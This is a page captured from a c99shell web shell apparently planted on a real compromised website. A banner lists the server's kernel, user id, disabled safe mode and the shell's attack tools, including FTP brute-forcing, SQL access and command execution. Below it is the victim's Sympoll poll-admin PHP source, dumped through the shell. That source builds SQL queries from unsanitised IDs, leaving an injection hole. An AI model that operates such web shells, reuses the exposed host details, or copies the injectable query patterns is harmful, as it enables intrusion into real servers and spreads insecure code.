www.mina-info.me - c99shell

!C99Shell v. 1.0 pre-release build #16!
Software: Apache/2.0.54 (Fedora). PHP/5.0.4 uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t Safe-mode: OFF (not secure) /home/mnnews/public_html/poll/admin/ drwxr-xr-x Free 3.96 GB of 27.03 GB (14.64%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php



///////////////////////////////////////////////////////////////////

// DISPLAYS POLL INFORMATION

///////////////////////////////////////////////////////////////////

function display_view($pid) {

  global $ext, $title, $symphome;



  $p = new Poll($pid);

  $boothlocale = "$symphome"."/booth."."$ext";



  $title = "View Poll";

  spit_header(); ?>



  <font size="5"><b><i><?php echo $p->ident; ?></i></b></font>

  <br><br><b>Question:</b><br><?php echo $p->question; ?>

  <br><br><b>Choices:</b>



  <?php $dsr = 1;

  while(is_array($p->options) && list($k,$v) = each($p->options)) {

    if($dsr < 10) { ?>

      <br>&nbsp;Option 0<?php echo $dsr; ?>:&nbsp;<?php echo $v; ?>

    <?php } else { ?>

      <br>&nbsp;Option <?php echo $dsr; ?>:&nbsp;<?php echo $v; ?>

    <?php }

    $dsr++;

  } ?>



  <br><br><br><b>To embed this poll into a webpage, use this code:</b><br>

  <font size="3"><tt>&nbsp;&lt;?php require '<?php echo $boothlocale; ?>';<br>

  &nbsp;display_booth(<?php echo $pid; ?>); ?&gt;</tt></font>

  <?php if(!is_file($boothlocale)) { ?>

    <br><br>

    <font size="4"><b>WARNING:</b> above path seems incorrect!</font><br>

  <?php }

  spit_footer();

}





///////////////////////////////////////////////////////////////////

// DISPLAYS FORM USED TO CREATE POLLS

///////////////////////////////////////////////////////////////////

function display_create() {

  global $ext, $s_maxopts, $title;



  $title = "Create Poll";

  spit_header(); ?>

  <form action="index.<?php echo $ext; ?>" method="post">

  <input type="hidden" name="action" value="polls_p_create">

  A very short, unique identifier for this poll:<br>

  (this will only be used in the admin page)<br>

  <input type="text" maxlength="20" size="20" name="ident"><br>

  <br>The poll question that you wish to be displayed:<br>

  <input type="text" maxlength="150" size="50" name="question"><br>

  <br>Available voting options:



  <?php for($dsr=1; $dsr <= $s_maxopts; $dsr++) {

    if($dsr < 10) { ?>

      <br>&nbsp;&nbsp;Option 0<?php echo $dsr; ?>:&nbsp;

    <?php } else { ?>

      <br>&nbsp;&nbsp;Option <?php echo $dsr; ?>:&nbsp;

    <?php } ?>

    <input type="text" maxlength="100" size="30" name="newo[<?php echo $dsr; ?>]">

  <?php } ?>



  <br><br><input type="submit" value="Create Poll"> &nbsp;

  <input type="reset" value="Clear Values"></form>

  <?php spit_footer();

}





///////////////////////////////////////////////////////////////////

// DISPLAYS FORM USED TO EDIT POLLS

///////////////////////////////////////////////////////////////////

function display_edit($pid) {

  global $s_maxopts, $ext, $title;



  $p = new Poll($pid);

  $title = "Edit Poll";

  spit_header(); ?>



  <form action="index.<?php echo $ext; ?>" method="post">

  <input type="hidden" name="pid" value="<?php echo $pid; ?>">

  <input type="hidden" name="action" value="polls_p_edit">



  <br>A very short, unique identifier for this poll:<br>

  (this will only be used in the admin page):<br>

  <input type="text" maxlength="20" size="20" name="ident" value="<?php echo $p->ident; ?>">

  <br><br>The poll question you wish to be displayed:<br>

  <input type="text" maxlength="150" size="50" name="question" value="<?php echo $p->question; ?>">



  <br><br>Edit these options:

  <?php $dsr = 1;

  while(is_array($p->options) && list($k,$v) = each($p->options)) {

    if($dsr < 10) { ?>

      <br>&nbsp;&nbsp;Option 0<?php echo $dsr; ?>:&nbsp;

    <?php } else { ?>

      <br>&nbsp;&nbsp;Option <?php echo $dsr; ?>:&nbsp;

    <?php } ?>

    <input type="text" name="updateo[<?php echo $k; ?>]" maxlength="100" size="30" value="<?php echo $v; ?>">

    <input type="checkbox" name="deleteo[<?php echo $k; ?>]" value="poof">&nbsp;delete

    <?php $dsr++;

  } ?>



  <br><br>Add these options:

  <?php $left = $s_maxopts - $dsr;

  for($x=0; $x <= $left; $x++) {

    if($dsr < 10) { ?>

      <br>&nbsp;&nbsp;Option 0<?php echo $dsr; ?>:&nbsp;

    <?php } else { ?>

      <br>&nbsp;&nbsp;Option <?php echo $dsr; ?>:&nbsp;

    <?php } ?>

    <input type="text" name="newo[<?php echo ($p->nextcid + $x); ?>]" maxlength="100" size="30">

    <?php $dsr++;

  } ?>



  <br><br><input type="submit" value="Process Changes"> &nbsp;

  <input type="reset" value="Undo Changes"></form>

  <?php spit_footer();

}





///////////////////////////////////////////////////////////////////

// DISPLAYS FORM USED FOR DELETE/RESET CONFIRMATION

///////////////////////////////////////////////////////////////////

function display_del_rs($pid, $action) {

  global $ext, $title;



  $p = new Poll($pid);



  if($action == 'polls_d_reset') { 

    $act = 'reset'; 

  } else {

    $act = 'delete';

  }

  $title = ucfirst($act)." Poll";

  spit_header(); ?>



  <form action="index.<?php echo $ext; ?>" method="post">

  <input type="hidden" name="pid" value="<?php echo $pid; ?>">

  <input type="hidden" name="ident" value="<?php echo $p->ident; ?>">

  <input type="hidden" name="action" value="polls_p_<?php echo $act; ?>">

  <font size="4"><b>WARNING:  THIS CANNOT BE UNDONE</b></font>

  <br><br>

  Are you sure that you want to <b><u><?php echo $act; ?></u>

  <?php echo $p->ident; ?></b><br><br>

  <input type="radio" name="confirmation" value="no" checked="checked"> nevermind

  &nbsp;&nbsp;&nbsp;

  <input type="radio" name="confirmation" value="<?php echo $act; ?>"> yes

  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

  <input type="submit" value="Continue"><br></form>

  <?php spit_footer();

}





///////////////////////////////////////////////////////////////////

// PROCESSES CREATE ACTION

///////////////////////////////////////////////////////////////////

function process_create($ident, $question, $newo) {

  global $g_message, $s_dbid;



  if($question == "") {

    $g_message = "poll creation <b>failed</b> because question was blank";

    return;

  }

  if($ident == "") {

    $g_message = "poll creation <b>failed</b> because identifier was blank";

    return;

  }



  // insert poll info

  $time = time();

  $q1 = "INSERT INTO sympoll_list VALUES(NULL, '".addslashes($ident)."', 0, '".addslashes($question)."', '$time', 0)";

  $r1 = mysql_query($q1, $s_dbid);

  $q2 = "SELECT pid FROM sympoll_list WHERE timeStamp='$time'";

  $r2 = mysql_query($q2, $s_dbid);

  $a2 = mysql_fetch_array($r2);

 

  // insert and count options

  $dsr = 0;

  while(is_array($newo) && list($k,$v) = each($newo)) {

    if(trim($v) != "") {

      $q3 = "INSERT INTO sympoll_data VALUES('$a2[pid]', '$dsr', '".addslashes($v)."', 0)";

      $r3 = mysql_query($q3, $s_dbid);

      $dsr++;

    }

  }



  // update correct value for nextcid

  $q4 = "UPDATE sympoll_list SET nextcid='$dsr' WHERE pid='$a2[pid]'";

  $r4 = mysql_query($q4, $s_dbid);



  display_view($a2['pid']);

}





///////////////////////////////////////////////////////////////////

// PROCESSES EDIT ACTION

///////////////////////////////////////////////////////////////////

function process_edit($pid, $ident, $question, $newo, $updateo, $deleteo) {

  global $g_message, $s_dbid;



  if($question == "") {

    $g_message = "poll edit <b>failed</b> because question was blank";

    return;

  }

  if($ident == "") {

    $g_message = "poll edit <b>failed</b> because identifier was blank";

    return;

  }



  // update the question and ident

  $q1  = "UPDATE sympoll_list SET ";

  $q1 .= "question='".addslashes($question)."',identifier='".addslashes($ident)."'";

  $q1 .= " WHERE pid='$pid'";

  $r1 = mysql_query($q1, $s_dbid);



  // add options

  $maxcid = 0;

  while(is_array($newo) && list($k,$v) = each($newo)) {

    if(trim($v) != "") {

      $q2 = "INSERT INTO sympoll_data VALUES('$pid', '$k', '".addslashes($v)."', 0)";

      $r2 = mysql_query($q2, $s_dbid);

      if($k > $maxcid) 

        { $maxcid = $k; }

    }

  }

  // update nextcid

  if(sizeof($newo) > 0) {

    $q3 = "UPDATE sympoll_list SET nextcid='".($maxcid+1)."' WHERE pid='$pid'";

    $r3 = mysql_query($q3, $s_dbid);

  }



  // update options

  while(is_array($updateo) && list($k,$v) = each($updateo)) {

    if(trim($v) != "") {

      $q4 = "UPDATE sympoll_data SET choice='".addslashes($v)."' WHERE(cid='$k' AND pid='$pid')";

      $r4 = mysql_query($q4, $s_dbid);

    }

  }



  // delete options

  while(is_array($deleteo) && list($k,$v) = each($deleteo)) {

    if($v == 'poof') {

      $q5 = "DELETE FROM sympoll_data WHERE(cid='$k' AND pid='$pid')";

      $r5 = mysql_query($q5, $s_dbid);

    }

  }



  display_view($pid);

}





/////////////////////////////////////////////////////////////////////

// PROCESSES DELETE/RESET ACTION

/////////////////////////////////////////////////////////////////////

function process_del_rs($pid, $ident, $confirmation) {

  global $g_message, $s_dbid;



  if($confirmation == 'delete') {

    $q1 = "DELETE FROM sympoll_list WHERE pid='$pid'";

    $r1 = mysql_query($q1, $s_dbid);

    $q2 = "DELETE FROM sympoll_data WHERE pid='$pid'";

    $r2 = mysql_query($q2, $s_dbid);

    $q3 = "DELETE FROM sympoll_iplog WHERE pid='$pid'";

    $r3 = mysql_query($q3, $s_dbid);

    $g_message = "<i>$ident</i> has been deleted";

  } elseif($confirmation == 'reset') {

    $q4 = "UPDATE sympoll_list SET timeStamp='".time()."' WHERE pid='$pid'";

    $r4 = mysql_query($q4, $s_dbid);

    $q5 = "UPDATE sympoll_data SET votes='0' WHERE pid='$pid'";

    $r5 = mysql_query($q5, $s_dbid);

    $q6 = "DELETE FROM sympoll_iplog WHERE pid='$pid'";

    $r6 = mysql_query($q6, $s_dbid);

    $g_message = "<i>$ident</i> has been reset";

  } else {

    $g_message = "modification of <i>$ident</i> was <b>aborted</b>"; 

  }

}





/////////////////////////////////////////////////////////////////////

// PROCESSES TOGGLE ACTION

/////////////////////////////////////////////////////////////////////

function process_toggle($pid) {

  global $g_message, $s_dbid;



  $q1 = "SELECT identifier,status FROM sympoll_list WHERE pid='$pid'";

  $r1 = mysql_query($q1, $s_dbid);

  $a1 = mysql_fetch_array($r1);



  // toggle and store it

  if($a1['status'] == 1) { 

    $status = 0; 

    $g_message = "<i>$a1[identifier]</i> has been deactivated";

  } else { 

    $status = 1; 

    $g_message = "<i>$a1[identifier]</i> has been activated";

  }

  $q2 = "UPDATE sympoll_list SET status='$status' WHERE pid='$pid'";

  $r2 = mysql_query($q2, $s_dbid); 

}



?>
:: Command execute ::
Enter:	Select: